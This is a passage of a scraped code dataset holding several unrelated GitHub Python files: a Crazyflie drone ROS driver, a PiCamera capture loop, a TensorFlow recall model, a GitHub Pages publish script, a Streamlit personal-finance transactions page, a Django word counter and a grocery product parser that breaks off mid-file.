Author: Qian Zhao\n\nimport rospy\nimport cflib\nfrom geometry_msgs.msg import Twist\nfrom geometry_msgs.msg import Pose\nfrom geometry_msgs.msg import Point\nfrom geometry_msgs.msg import Quaternion\n\nimport logging\nimport time\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n\nimport cflib.crtp\nfrom cflib.crazyflie import Crazyflie\nfrom cflib.crazyflie.syncCrazyflie import SyncCrazyflie\nfrom cflib.crazyflie.syncLogger import SyncLogger\nfrom cflib.crazyflie.log import LogConfig\nfrom cflib.positioning.motion_commander import MotionCommander\n\nlogging.basicConfig(level=logging.ERROR)\nURI = 'radio://1/7/1M'\n\n\nclass Node:\n\n    def __init__(self):\n        \n        self.vx = 0\n        self.vy = 0\n        self.vz = 0\n        self.va = 0\n        \n        self.vel = Twist()\n        self.pose = Pose()\n\n        self.vel.linear.x = self.vx\n        self.vel.linear.y = self.vy\n        self.vel.linear.z = self.vz\n        self.vel.angular.z = self.va\n\n        cflib.crtp.init_drivers(enable_debug_driver=False)\n        self.crazyflie = SyncCrazyflie(URI, cf = Crazyflie(rw_cache='./cache'))\n        self.commander = MotionCommander(self.crazyflie)\n        self.cf = Crazyflie()\n        self.crazyflie.open_link()\n        self.commander.take_off()\n\n    def write_to_file(self, data):\n        # Two loggers should yield an even number of rows of data\n        # being collected in the end.\n        # There is one packet missing if the array only contains\n        # an odd number of rows of data.\n        if len(data) % 2 != 0:\n            data = data[:len(data) - 1]\n\n        temp_df = pd.DataFrame(data)\n        m, _ = temp_df.shape\n        even_rows = temp_df.iloc[np.arange(0, m, 2), :]\n        odd_rows = temp_df.iloc[np.arange(1, m, 2), :]\n\n        columns = ['timestamp_start', 'timestamp_end',\n                   'acc.x', 'acc.y', 'acc.z',\n                   'gyro.x', 'gyro.y', 'gyro.z',\n                   'stateEstimate.x', 'stateEstimate.y', 'stateEstimate.z',\n                   'stabilizer.pitch', 'stabilizer.roll', 'stabilizer.yaw']\n\n        df = pd.DataFrame(data=np.zeros((int(m / 2), 14)), columns=columns)\n        df[['gyro.x', 'gyro.y', 'gyro.z']] = np.array(even_rows[['gyro.x', 'gyro.y', 'gyro.z']])\n        df[['stabilizer.pitch', 'stabilizer.roll', 'stabilizer.yaw']] = np.array(\n            even_rows[['stabilizer.pitch', 'stabilizer.roll', 'stabilizer.yaw']])\n        df[[\"acc.x\", \"acc.y\", \"acc.z\"]] = np.array(odd_rows[[\"acc.x\", \"acc.y\", \"acc.z\"]])\n        df[[\"stateEstimate.x\", \"stateEstimate.y\", \"stateEstimate.z\"]] = \\\n            np.array(odd_rows[[\"stateEstimate.x\", \"stateEstimate.y\", \"stateEstimate.z\"]])\n        df['timestamp_start'] = np.array(even_rows.timestamp)\n        df['timestamp_end'] = np.array(odd_rows.timestamp)\n\n        # df.to_csv(\"data/project2/drone2/data_set_label_\"\n        #           +class_label+\"_packet_\"+packet_num+\".csv\")\n        df.to_csv(\"test.csv\")\n\n    def write(self, data):\n        print(data)\n\n    def log1(self):\n\n        lg1 = LogConfig(name='pose_acc', period_in_ms=10)\n\n        lg1.add_variable('stateEstimate.x', 'float')\n        lg1.add_variable('stateEstimate.y', 'float')\n        lg1.add_variable('stateEstimate.z', 'float')\n\n        lg1.add_variable('acc.x', 'float')\n        lg1.add_variable('acc.y', 'float')\n        lg1.add_variable('acc.z', 'float')\n\n        return lg1\n\n    def log2(self):\n\n        lg2 = LogConfig(name='stabilizer_gyro', period_in_ms=10)\n        \n        lg2.add_variable('stabilizer.roll', 'float')\n        lg2.add_variable('stabilizer.pitch', 'float')\n        lg2.add_variable('stabilizer.yaw', 'float')\n\n        lg2.add_variable('gyro.x', 'float')\n        lg2.add_variable('gyro.y', 'float')\n        lg2.add_variable('gyro.z', 'float')\n\n        return lg2\n\n    def sync(self, position_pub, data):\n\n        switch = 0\n        
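# alternate between the two log configs each pass so stabilizer/gyro and pose/acc packets interleave 1:1\n        with SyncLogger(self.crazyflie, self.log1()) as logger1, \\\n                SyncLogger(self.crazyflie, self.log2()) 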
as logger2:\n            end_time = time.time() + 24\n            while time.time() < end_time:\n                if switch == 0: \n                    logger = logger2\n                elif switch == 1:\n                    logger = logger1\n\n                for log_entry in logger:\n                    row = log_entry[1]\n                    row[\"timestamp\"] = log_entry[0]\n                    if switch == 1:\n                        x = row['stateEstimate.x']\n                        y = row['stateEstimate.y']\n                        z = row['stateEstimate.z']\n\n                        self.pose.position.x = x\n                        self.pose.position.y = y\n                        self.pose.position.z = z\n\n                        position_pub.publish(self.pose)\n                        print('x:',x,' y:',y,' z:',z)\n                        print()\n                    data.append(row)\n                    switch += 1\n                    break\n\n                if switch == 2:\n                    switch = 0\n        return None\n\n    def shut_down(self):\n        self.crazyflie.close_link()\n\n    def cmd_vel(self, msg):\n        \n        self.vx = msg.linear.x\n        self.vy = msg.linear.y\n        self.vz = msg.linear.z\n        self.va = msg.angular.z\n        self.commander._set_vel_setpoint(self.vx,self.vy,self.vz,self.va)\n\n        print(self.vx, self.vy, self.vz, self.va) \n\n\ndef run():\n    data =[]\n    rospy.init_node('drone1')\n    node = Node()\n    cmdVel_subscribe = rospy.Subscriber('drone1/cmd_vel', Twist, node.cmd_vel)\n    position_pub = rospy.Publisher('drone1/pose', Pose, queue_size=10)\n    timer = time.time() \n\n    while time.time()-timer < 24:\n        node.sync(position_pub, data)\n    print(\"End\")\n\n    node.write_to_file(data)\n    node.shut_down()\n\n\nif __name__ == '__main__':\n    run()\n\n","repo_name":"qianzhao27/Driver_of_crazyflie","sub_path":"driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":5781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"73841566244","text":"# learn by project\n# inventory\n\nimport time\n\n# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n# set of possible things - \n# database with parameters - possible value intervals\n\n# name generator from another database\n\n# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n# loading script \n# creates dictionary from database ?\n\n\n#armory = \n\n\n#d = {}\nd = {\n    \"name\":\"Mighty Sword\", \n    \"type\":\"long-sword\", \n    \"damage\": {\n        \"drop\": {\n            \"min\":10, # minimal for drop rate\n            \"max\":20 # maximal for drop rate\n        },\n        \"crit\":42 # always the same\n    },\n    \"weight\": 10,\n    \"durability\": {\n        \"drop\": {\n            \"min\":50,\n            \"max\":100\n        },\n        \"coeficient\":1\n    },\n    \"slots\": {\n        \"x\":1,\n        \"y\":4\n    },\n    \"material\":\"irridium\"\n#    \"model\":\"long_sword_1 # model would be generated in loading time as a combination of individual database parameters with an extension\n    }\n\n#d[\"key\"] = \"value\"\n#str = d[\"damage\"][\"crit\"]\n\nstr = d[\"damage\"][\"crit\"]*10\n\nprint(str)\n\ntime.sleep(2)\n\n# list [ \n\n# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n# inventory \n# list that can import things by find_random ...\n# add item with random parameters with values within possible value intervals\n\n# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n# quest\n# find enough items for killing enemy - enough damage\n","repo_name":"gr4viton/python-scripts","sub_path":"inventory.py","file_name":"inventory.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"16937360414","text":"\nimport os\nimport sys\nimport yaml\n\n# Crude way to set up the import path, but it at least works\nsys.path.append(os.path.abspath('./'))\nfrom common.indexing import get_all_markdown_file\n# print(sys.path)\n\n\ndef removing_dir(to_delete_path):\n    
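# NOTE: this recursive walk deletes files only; emptied sub-directories are left behind because os.rmdir is never called\n    if not 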
os.path.exists(to_delete_path):\n print('要删除的目录 ' + to_delete_path + ' 不存在')\n return\n if os.path.isdir(to_delete_path):\n for item in os.listdir(to_delete_path):\n removing_dir(to_delete_path + '/' + item)\n else:\n os.remove(to_delete_path)\n print('目录 ' + to_delete_path + ' 已经删除')\n\n\ndef markdown_moving(source_root_path, dist_root_path):\n parent_dirs = []\n for markdown_file in get_all_markdown_file(source_root_path):\n parent_dir = ''\n for subdir in markdown_file.split('/')[:-1]:\n parent_dir = parent_dir + subdir + '/'\n parent_dir = parent_dir.rstrip('/')\n parent_dirs.append(parent_dir)\n \n for parent_dir in parent_dirs:\n dist_parent_dir = parent_dir.replace(source_root_path, dist_root_path)\n print(dist_parent_dir)\n if not os.path.exists(dist_parent_dir):\n print(dist_parent_dir + ' not exists, and createing it...')\n os.makedirs(dist_parent_dir)\n \n for markdown_file in get_all_markdown_file(source_root_path):\n print('copy ' + markdown_file + ' ' + markdown_file.replace(source_root_path, dist_root_path))\n os.system('copy ' + markdown_file.replace('/','\\\\') + ' ' + markdown_file.replace(source_root_path, dist_root_path).replace('/','\\\\'))\n\n\nif __name__=='__main__':\n # 一些基本参数\n source_file_folder = 'C:/Users/Five/Desktop/note'\n github_folder = 'C:/Users/Five/Documents/Github'\n \n user_name = 'wodswos'\n repository_name = 'wodswos.github.io'\n repository_path = github_folder + '/' + repository_name\n\n # 一系列会用到的 git 命令,默认已配置 ssh\n git_clone_command = 'git clone git@github.com:' + user_name + '/' + repository_name\n git_add_command = 'git add --all'\n git_commit_command = \"git commit -m debugging\"\n git_push_command = 'git push git@github.com:' + user_name + '/' + repository_name\n\n # 仓库已经存在则切换到目录,否则先 clone 仓库\n if not os.path.exists(repository_path):\n os.chdir(github_folder)\n os.system(git_clone_command)\n os.chdir(repository_path)\n\n # 清空除 .git 以外的文件夹,从零重新生成\n rebuild_flag = True\n for item in os.listdir(repository_path):\n if item != '.git' and rebuild_flag == True:\n print(item)\n removing_dir(repository_path + '/' + item)\n\n\n # 主逻辑\n if not os.path.exists(repository_path):\n os.mkdir(repository_path)\n pages_path = repository_path + '/src/pages'\n markdown_moving(source_file_folder, repository_path)\n\n\n # 提交,收尾\n os.system(git_add_command)\n print('Added to index.')\n os.system(git_commit_command)\n print('Committed to local repository.')\n os.system(git_push_command)\n print('Pushed to Github.')\n","repo_name":"Wodswos/bisheng","sub_path":"publish/GithubPagesLocalBuild.py","file_name":"GithubPagesLocalBuild.py","file_ext":"py","file_size_in_byte":3084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41550994737","text":"from picamera import PiCamera\nfrom time import sleep\nfrom vutil import *\n\nwith PiCamera() as camera:\n camera.vflip = True\n camera.resolution = get_resolution()\n\n camera.start_preview()\n for i in range(5):\n sleep(5)\n camera.capture(f'./image_{i}.jpg')\n \n camera.stop_preview()","repo_name":"hongjy127/TIL","sub_path":"07. 
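Two portability notes on the GitHub Pages build script above: removing_dir deletes files but never the emptied directories themselves, and the copy step shells out to the Windows-only copy command with hand-converted separators. A sketch of the same two operations using only the standard library (function names here are illustrative):

import os
import shutil

def wipe_dir_keep(root, keep=(".git",)):
    # Delete everything under root except entries named in `keep`,
    # including subdirectories, which shutil.rmtree removes in one call.
    for item in os.listdir(root):
        if item in keep:
            continue
        path = os.path.join(root, item)
        if os.path.isdir(path):
            shutil.rmtree(path)
        else:
            os.remove(path)

def copy_file(src, dst):
    # Portable replacement for os.system('copy ...'); copy2 keeps timestamps.
    os.makedirs(os.path.dirname(dst), exist_ok=True)
    shutil.copy2(src, dst)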
raspberrypi/python/picam-ex/imagecapture/ex03.py","file_name":"ex03.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41620851527","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport math\nimport sys\nimport numpy as np\nimport tensorflow as tf\n\nimport dnn_feature_views as fv\n# Step 4: Build and train a recall model.\n\nuv_size = 128 # Dimension of the user/item vector.\n\ngraph = tf.Graph()\n\nwith graph.as_default():\n # hidden layer\n W1 = tf.Variable(tf.truncated_normal([fv.embedding_size, uv_size]))\n b1 = tf.Variable(tf.truncated_normal([uv_size]))\n #W2 = tf.Variable(tf.truncated_normal([256, uv_size]))\n #b = tf.Variable(tf.truncated_normal([uv_size]))\n\n # Input data.\n train_dataset = tf.sparse_placeholder(tf.int32, shape=[fv.batch_size, fv.vocabulary_size])\n train_labels = tf.placeholder(tf.int32, shape=[fv.batch_size, 1])\n\n # Ops and variables pinned to the CPU because of missing GPU implementation\n with tf.device('/cpu:0'):\n # Look up embeddings for inputs.\n embeddings = tf.Variable(\n tf.random_uniform([fv.vocabulary_size, fv.embedding_size], -1.0, 1.0))\n\n # Construct the variables for the NCE loss\n nce_weights = tf.Variable(\n tf.truncated_normal([fv.vocabulary_size, uv_size],\n stddev=1.0 / math.sqrt(uv_size)))\n nce_biases = tf.Variable(tf.zeros([fv.vocabulary_size]))\n\n embed = tf.nn.embedding_lookup_sparse(embeddings,train_dataset, sp_weights=None, combiner=\"mean\")\n\n layer1 = tf.nn.relu(tf.matmul(embed, W1) + b1)\n #layer2 = tf.nn.relu(tf.matmul(layer1, W2))#) + b)\n #Compute the average NCE loss for the batch.\n #tf.nce_loss automatically draws a new sample of the negative labels each\n #time we evaluate the loss.\n loss = tf.reduce_mean(\n tf.nn.nce_loss(weights=nce_weights,\n biases=nce_biases,\n labels=train_labels,\n inputs=layer1,\n num_sampled=fv.num_sampled,\n partition_strategy=\"div\",\n num_classes=fv.vocabulary_size))\n\n # Construct the SGD optimizer using a learning rate of 1.0.\n optimizer = tf.train.AdamOptimizer(0.01).minimize(loss)\n\n # Add variable initializer.\n init = tf.global_variables_initializer()\n saver = tf.train.Saver()\n# Step 5: Begin training.\n\nwith tf.Session(graph=graph) as session:\n # We must initialize all variables before we use them.\n init.run()\n print(\"Initialized\")\n checkpoint_dir = \"./ckpt/\"\n infer_ckpt = tf.train.get_checkpoint_state(checkpoint_dir)\n if infer_ckpt and infer_ckpt.model_checkpoint_path:\n print(\"Use the model {}\".format(infer_ckpt.model_checkpoint_path))\n saver.restore(session, infer_ckpt.model_checkpoint_path)\n for step in range(fv.num_steps):\n step += 1\n batch_inputs, batch_labels = fv.generate_batch(fv.batch_size)\n feed_dict = {train_dataset: batch_inputs, train_labels: batch_labels}\n\n # We perform one update step by evaluating the optimizer op (including it\n # in the list of returned values for session.run()\n _, loss_val = session.run([optimizer, loss], feed_dict=feed_dict)\n\n if step % 100 == 0:\n print(\"Average loss at step \", step, \": \", loss_val)\n average_loss = 0\n if step % 100000 == 0:\n save_path = saver.save(session, checkpoint_dir+'model.ckpt',global_step=step)\n print(\"Model saved in file: %s\" % save_path)\n\n np.savetxt(fv.itemvec, 
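The recall model above trains item vectors as NCE weights and dumps them with np.savetxt. Serving then reduces to scoring items by inner product against a user vector. A minimal sketch assuming the saved layout is one row per item with uv_size columns (for large vocabularies an ANN index such as faiss would replace the brute-force argsort):

import numpy as np

def top_k_items(user_vec, item_matrix_path, k=10):
    # Load the matrix written by np.savetxt: (vocabulary_size, uv_size).
    items = np.loadtxt(item_matrix_path)
    scores = items @ user_vec          # inner-product similarity
    return np.argsort(scores)[::-1][:k]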
nce_weights.eval())\n","repo_name":"Jayyyyyyyyyyyy/recall-rank","sub_path":"src/main/python/dnn_recall_model.py","file_name":"dnn_recall_model.py","file_ext":"py","file_size_in_byte":3540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6355914545","text":"# Dictionary file location, change if needed.\ndictionary_loc = 'DATA TXT Files\\dictionary.txt'\n\n# Turn text file location, change if needed.\nturn_text_loc = 'data/turntext.txt'\n\n# Wheel contents for file location, change if needed.\nwheel_text_loc = 'DATA TXT FILES\\wheeldata.txt'\n\n# End of Round Status status file, change if needed.\nround_status_loc = 'data/roundstatus.txt'\n\n# number of rounds in a game\nmax_rounds = 3\n\n# Vowel cost\nvowel_cost = 250\n\n# final prize, you fill this in\nfinal_prize = 50000\n\n# final round, change if needed.\nfinal_round_text_loc = 'data/finalround.txt'\n","repo_name":"nolanthomas32/M06-Assessment","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37153934364","text":"#!/usr/bin/env python3\nimport rospy\n\nfrom std_msgs.msg import Int32, Bool\n\nfrom common.pwm_driver import PWMDriver\n\nclass ESCController:\n \"\"\"\n Controller for the ESC.\n \"\"\"\n def __init__(self):\n self.__id = rospy.get_param(\"VEHICLE_ID\")\n self.__message_queue_size = rospy.get_param(\"MESSAGE_QUEUE_SIZE\")\n\n self.__idle = rospy.get_param(\"IDLE_MOTOR\")\n self.__min_forward = rospy.get_param(\"MIN_FORWARD_MOTOR\")\n self.__max_forward = rospy.get_param(\"MAX_FORWARD_MOTOR\")\n self.__max_reverse = rospy.get_param(\"MAX_REVERSE_MOTOR\")\n self.__calibrated = False\n\n self.__driver = PWMDriver(\n rospy.get_param(\"MOTOR_PIN\"),\n rospy.get_param(\"PWM_FREQUENCY_MOTOR\"))\n\n self.__calibrated_publisher = rospy.Publisher(\n f\"{self.__id}/esc_calibrated\",\n Bool,\n queue_size=self.__message_queue_size)\n\n rospy.Subscriber(f\"{self.__id}/pwm\", Int32, self.__callback_pwm)\n rospy.Timer(\n rospy.Duration(1),\n self.__callback_start_calibration,\n oneshot=True)\n\n # Continuously broadcast calibrated to ensure that every node\n # receives it.\n rospy.Timer(\n rospy.Duration(3),\n self.__callback_broadcast_calibration)\n\n def __callback_start_calibration(self, event):\n self.__driver.set_pwm(self.__idle)\n\n def __callback_broadcast_calibration(self, event):\n self.__calibrated = True\n self.__calibrated_publisher.publish(True)\n\n def __callback_pwm(self, msg: Int32):\n \"\"\"\n Callback function for the pwm.\n \"\"\"\n if not self.__calibrated:\n return\n\n new_pwm = max(self.__max_reverse, min(msg.data, self.__max_forward))\n self.__driver.set_pwm(new_pwm)\n\n def stop(self):\n \"\"\"\n Stop the ESC.\n \"\"\"\n self.__driver.set_pwm(self.__idle)\n self.__driver.cleanup()\n\nif __name__ == \"__main__\":\n rospy.init_node(\"esc_node\", anonymous=True)\n controller = ESCController()\n rospy.on_shutdown(controller.stop)\n\n rospy.loginfo(\"ESC controller node started.\")\n rospy.spin()\n","repo_name":"McFrappe/LAFF-Platooning","sub_path":"src/rcv/nodes/esc.py","file_name":"esc.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17959256273","text":"import requests\nimport sys\nimport os \nfrom pathlib import Path\nfrom datetime import datetime\nimport logging\n\nimport streamlit as st\nfrom 
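The ESC node above clamps each requested PWM into [max_reverse, max_forward] with nested max/min before writing it to the driver. The same guard as a standalone helper, with illustrative bounds (the real values come from ROS params and are not shown):

def clamp(value, lower, upper):
    # Constrain value to the closed interval [lower, upper].
    return max(lower, min(value, upper))

assert clamp(1700, 1200, 1600) == 1600  # above range: capped at max_forward
assert clamp(1000, 1200, 1600) == 1200  # below range: capped at max_reverse
assert clamp(1500, 1200, 1600) == 1500  # in range: unchanged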
streamlit_modal import Modal\nimport streamlit.components.v1 as components\n\nbase_container_path = str(Path(os.path.abspath(__file__)).parents[1]).replace('\\\\', '/')\nif base_container_path not in sys.path:\n sys.path.append(base_container_path)\nif \"/finapp/\" not in sys.path:\n sys.path.append('/finapp')\n\n\nfrom lib.mongo import mongo\nfrom categories.directory import load_categories\nimport transactions\nimport gui_utils\n# +-----------------+\n# | Initialize Page |\n# +-----------------+-----------------------------------------------\n# Setup logger\nlogger = logging.getLogger(__name__)\nif sum([isinstance(handler, logging.FileHandler) for handler in logger.handlers]):\n logger.setLevel(logging.DEBUG)\n handler=logging.FileHandler(\"/finapp/logs/gui.log\")\n formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(filename)s - %(message)s')\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n\n\nbanks = mongo.get_access_tokens()\n\ncategories = [cat.name for cat in load_categories()]\ncategories.append('N/A')\n\nif \"edit_view\" not in st.session_state or \"edit_transaction\" not in st.session_state:\n st.session_state.edit_view = False\n st.session_state.edit_transaction = None\n\nSESSION_STATE = st.session_state\n# +---------------+\n# | Load Sidebar |\n# +---------------+-----------------------------------------------\nwith st.sidebar:\n # Show Configuration Options\n month_offset = gui_utils.choose_month_widget()\n category = st.selectbox('Category', categories, index=(len(categories)-1))\n categorize = st.button(\"Re-Categorize\")\n if categorize:\n st.write(transactions.sort(month_offset=month_offset))\n update = st.button(\"Update Transactions\")\n\n # +--------------------------------------+\n # | Update Transactions (inside sidebar) |\n # +--------------------------------------+---------------------------------\n if update:\n logger.info(\"Updating Transactions\")\n progress_text = \"Updating Transaction Information\"\n progress = 0\n progress_bar = st.progress(progress, text=progress_text)\n\n progress_bar.progress(progress + 5, text=f\"{progress_text}\\n\\nLoading First Institution\")\n for bank in [b for b in banks if b['working']]:\n try:\n progress_bar.progress(progress + 5, text=f\"{progress_text}\\n\\nLoading {bank['bank_name']}\")\n resp = requests.get('http://plaid:5000/api/get_transactions', params={\"access_token\":bank['access_token']})\n\n # Update progress bar\n progress += int((1/len(banks))*100)\n if progress >= 100: progress = 100\n progress_bar.progress(progress, text=f\"{progress_text}\\n\\nCompleted {bank['bank_name']}\")\n except Exception as e:\n st.error(f\"Failed bank: {bank['bank_name']}\")\n st.error(e)\n st.write(e)\n progress_bar.progress(progress, text=f\"Finished Updating Transaction Information\\n\\n{resp.text}\") \n\n# +-----------------------+\n# | Edit Transaction View |\n# +-----------------------+---------------------------------\ndef _open_edit_view(transaction):\n # persist edit view\n st.session_state.edit_view = True\n st.session_state.edit_transaction = transaction\n\n # Print Information\n st.write('---')\n st.title(\"Edit Transaction\")\n # print headers\n col_headers = ['Amount', 'Account', 'Name', \"Date Authorized\", \"Category\"]\n modal_cols = st.columns((1, 1, 2, 2, 1))\n for col, header in zip(modal_cols, col_headers):\n col.write(header)\n \n # parse transaction data\n amount = f\"{float(transaction['amount']):.2f}\"\n account = transaction['account']\n name = transaction['name']\n date = 
transaction['date_authorized']\n category = transaction['category']\n \n # print transaction data\n for col, val in zip(modal_cols, (amount, account, name, date, category)):\n col.write(val)\n \n # Show Edit Options\n cat_dropdown, _, apply_but, cancel_but = st.columns((1,2,1,1))\n manual_cat = cat_dropdown.selectbox( 'Change Category to:', categories, args = (transaction,))\n apply_but.button(\"Apply\", on_click=_apply_edit, args=(transaction, manual_cat))\n cancel_but.button(\"Cancel\", on_click=_cancel_edit)\n st.write('---')\n\n\ndef _cancel_edit():\n st.session_state.edit_view = False \n st.session_state.edit_transaction = None\n\ndef _apply_edit(transaction, category):\n transaction['category'] = category\n logger.info(f\"Categorizing transaction ({transaction['_id']}:{transaction['name']}:{transaction['name']}): {category}\")\n mongo.set_transaction(transaction)\n _cancel_edit()\n\n# +---------------------------------------+\n# | Show Transactions (category specific) |\n# +---------------------------------------+---------------------------------\n# Setup \nmodal = Modal(key=\"Transaction Modal\", title=\"Transaction\")\ntotal = 0 \n\n# Pring Headers\ntitle = st.empty()\n\ncols_size_1 = (1, 3, 2, 2) # numbers represent width\ncol_headers = ['Amount', 'Name', \"Date\", \"Action\"]\nfor col, header in zip(st.columns(cols_size_1), col_headers):\n col.write(header)\n\n# List each transaction\ntrans = mongo.get_transactions(category, month_offset=month_offset)\nfor i, t in enumerate(trans):\n cols = st.columns(cols_size_1)\n amount = f\"{float(t['amount']):.2f}\"\n name = t['name']\n date = t['date_authorized']\n for col, val in zip(cols, (amount, name, date)):\n col.write(val)\n total += float(amount)\n with cols[3]:\n view, edit = st.columns(2, gap=\"small\")\n view_phold = view.empty()\n edit_phold = edit.empty()\n view = view_phold.button(\"View\", key=f\"view_{i}\")\n edit = edit_phold.button(\"Edit\", key=f\"edit_{i}\")\n\n # Keep Editin if already editing\n if st.session_state.edit_view:\n if (name == st.session_state.edit_transaction['name'] and \n t['amount'] == st.session_state.edit_transaction['amount']):\n _open_edit_view(st.session_state.edit_transaction)\n \n # Detailed View popup (modal popup)\n if view:\n with modal.container():\n cols_size_2 = (1, 1, 2, 2, 1) # numbers represent width\n col_headers = ['ID', 'Amount', 'Account', 'Name', \"Date Authorized\", \"Category\"]\n modal_cols = st.columns(cols_size_2)\n # print headers\n for col, header in zip(modal_cols, col_headers):\n col.write(header)\n # print detailed transaciton\n for col, val in zip(modal_cols, (t['_id'],amount, t['account'], name, date, t['category'])):\n col.write(val)\n # Open Edit view\n if edit:\n _open_edit_view(t)\n\nwith title.container():\n cat = 'Uncategorized' if category == 'N/A' else category\n st.title(f\"{cat}: ${total:,}\")\n\n # manual_category = st.selectbox(\n # 'Manual Category',\n # categories, on_change=_keep_state)\n # apply = st.button(\"Apply Category\")\n # if apply:\n # t['category'] = manual_category\n # logger.info(f\"Categorizing transaction ({t['_id']}): {manual_category}\")\n # mongo.set_transaction(t)\n \n # modal.open()\n # button_phold.empty() # remove button\n ","repo_name":"masinusa/my-finance","sub_path":"src/gui/pages/3_Transactions.py","file_name":"3_Transactions.py","file_ext":"py","file_size_in_byte":7510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26404737411","text":"import operator\n\nfrom 
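The transactions page above keeps its edit dialog open across Streamlit reruns by stashing a flag and the selected row in st.session_state and flipping them from button callbacks. A stripped-down sketch of that pattern, runnable on its own with `streamlit run`:

import streamlit as st

if "edit_view" not in st.session_state:
    st.session_state.edit_view = False
    st.session_state.edit_row = None

def open_edit(row):
    st.session_state.edit_view = True
    st.session_state.edit_row = row

def close_edit():
    st.session_state.edit_view = False
    st.session_state.edit_row = None

st.button("Edit row 42", on_click=open_edit, args=({"id": 42},))

if st.session_state.edit_view:
    st.write("Editing:", st.session_state.edit_row)
    st.button("Cancel", on_click=close_edit)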
django.http import HttpResponse\nfrom django.views import View\nfrom django.shortcuts import render\n\nclass MyView(View):\n\n def get(self, request, *args, **kwargs):\n # context ={ 'name':'Wathslaya', 'age' : 25, 'country' :'Srilanka'\n return render(request,'index.html' )\n\ndef count(request):\n\tfulltext = request.GET['fulltext']\n\twordlist = fulltext.split()\n\tword_dictionary = {}\n\tfor word in wordlist:\n\t\tif word in word_dictionary:\n\t\t\t#increase the frequency\n\t\t\tword_dictionary[word] += 1\n\t\telse:\n\t\t\t# add the word to the dictionary\n\t\t\tword_dictionary[word] = 1\n\t# word_dictionary.items convert the dict into list\n\tsorted_words = sorted(word_dictionary.items(),key=operator.itemgetter(1), reverse = True)\n\tprint(sorted_words)\n\n\treturn render(request, 'count.html', {'fulltext':fulltext,'count':len(wordlist),'word_dictionary':word_dictionary,'sorted':sorted_words})\n\n\n","repo_name":"Wathsalya/Counter_word_Django","sub_path":"myapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9291258685","text":"class Product:\n def __init__(self, json_data):\n self.itemName = json_data.get(\"item_title\", \"\")\n self.sku = json_data.get(\"sku\", \"\")\n self.itemPrice = (json_data.get(\"price_range\", {}) or {}).get(\"minimum_price\", {}).get(\"final_price\", {}).get(\"value\", \"\")\n self.salesSize = json_data.get(\"sales_size\", \"\")\n\n nutrition_data = (json_data.get(\"nutrition\") or [{}])[0]\n self.servingSize = nutrition_data.get(\"serving_size\", \"\")\n self.calPerServing = nutrition_data.get(\"calories_per_serving\", \"\")\n self.servingsPerContainer = nutrition_data.get(\"servings_per_container\", \"\")\n self.includes = \"\" # Initialize with empty string\n\n nutrition_details = (nutrition_data.get(\"details\") or [{}])\n nutrition_dict = {item.get('nutritional_item', ''): item for item in nutrition_details}\n self.totalFat = nutrition_dict.get('Total Fat', {}).get('amount', '')\n self.saturatedFat = nutrition_dict.get('Saturated Fat', {}).get('amount', '')\n self.transFat = nutrition_dict.get('Trans Fat', {}).get('amount', '')\n self.cholesterol = nutrition_dict.get('Cholesterol', {}).get('amount', '')\n self.sodium = nutrition_dict.get('Sodium', {}).get('amount', '')\n self.totalCarb = nutrition_dict.get('Total Carbohydrate', {}).get('amount', '')\n self.dietFiber = nutrition_dict.get('Dietary Fiber', {}).get('amount', '')\n self.totalSugars = nutrition_dict.get('Total Sugars', {}).get('amount', '')\n self.protein = nutrition_dict.get('Protein', {}).get('amount', '')\n self.vitaminD = nutrition_dict.get('Vitamin D', {}).get('amount', '')\n self.calcium = nutrition_dict.get('Calcium', {}).get('amount', '')\n self.iron = nutrition_dict.get('Iron', {}).get('amount', '')\n self.potassium = nutrition_dict.get('Potassium', {}).get('amount', '')\n \n # Handling the \"Includes\"/\"Added Sugars\" attribute\n self.includes = nutrition_dict.get('Includes', {}).get('amount', '')\n if self.includes == '': # If \"Includes\" is not found, try \"Added Sugars\"\n self.includes = nutrition_dict.get('Added Sugars', {}).get('amount', '')\n\n self.ingredients = [(ing.get(\"ingredient\", \"\") or \"\") for ing in (json_data.get(\"ingredients\") or [])]\n self.allergens = [(allergen.get(\"ingredient\", \"\") or \"\") for allergen in (json_data.get(\"allergens\") or [])]\n\n def to_dict(self):\n return {\n \"itemName\": self.itemName,\n 
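The count view above builds its frequency dict by hand and sorts it with operator.itemgetter; collections.Counter collapses both steps and returns the same most-frequent-first ordering:

from collections import Counter

def word_frequencies(fulltext):
    # (word, count) pairs, most frequent first; ties keep first-seen order.
    return Counter(fulltext.split()).most_common()

print(word_frequencies("the cat sat on the mat the end"))
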